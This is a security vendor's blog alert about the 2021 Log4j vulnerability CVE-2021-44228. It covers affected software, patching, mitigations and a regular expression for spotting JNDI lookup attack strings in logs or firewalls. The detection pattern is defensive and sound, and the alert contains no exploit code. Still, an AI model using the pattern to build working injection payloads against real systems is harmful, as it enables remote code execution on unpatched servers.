Generic selectors
Exact matches only
Search in title
Search in content
Post Type Selectors
post
page
analyst_report
resources
data_sheet
ebook
whitepaper
webinar
video
case_study
TorchLight

Log4j Critical Vulnerability 

Due to this being a component used by a substantial number of applications and systems, keep a close watch on anything which uses Java or Apache in any way. A spike in CPU usage on such a system may indicate crypto mining activity and ransomware could be next. 

by Paul Lange, Sr. Solutions Architect - East
Alert, News
Log4J

Log4j Critical Vulnerability

Today (12/10/2021), the critical vulnerability CVE-2021-44228 against log4j was released with zero-day exploitation actively occurring. If a device/application uses Java and logs any string relying on user input, it is vulnerable, and an attacker can run anything they wish on the system.

Currently, there is a public proof-of-concept, and we are observing the first wave of discovery attacks to determine who is vulnerable and the beginnings of the second wave consisting of crypto mining software. Following the standard escalation trend for this type of vulnerability, we expect to see automated ransomware deployment occurring by Monday (12/13/2021).

Affected Systems/Applications of Note 

As stated before, devices/applications that use Java logging containing user input are vulnerable. Some currently known vulnerable applications and services include:

  • Apache Solr, Druid, Flink, and Struts2
  • Redis
  • Logstash
  • Elastic Search
  • Kafka
  • Even home entertainment applications like Minecraft and Steam!

Remediation 

The updated and secure version of log4j is available directly for developers using the component: https://logging.apache.org/log4j/2.x/download.html

Third-party applications and systems should be patched immediately, and any subsequent patches should be evaluated and installed as quickly as possible.

Mitigation 

According to Cloudflare, this attack can be mitigated by using one of these two configuration changes:

  • Set the system property “log4j2.formatMsgNoLookups” to “true”
  • Remove the JndiLookup class from the classpath

Another mitigation is to use web applications and other firewalls to block the triggers from the proof-of-concept. This will require testing as it can very well break things! From current knowledge, the regular expression to block or use to search logs is:

  • \$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+

Conclusion 

Due to this being a component used by a substantial number of applications and systems, keep a close watch on anything that uses Java or Apache in any way. A spike in CPU usage on such a system may indicate crypto mining activity and ransomware could be next.

Reach out to TorchLight at sales@torchlight.io for help on remediation or any questions.

Additional Resources

  • https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/
  • https://www.zdnet.com/article/log4j-zero-day-flaw-what-you-need-to-know-and-how-to-protect-yourself/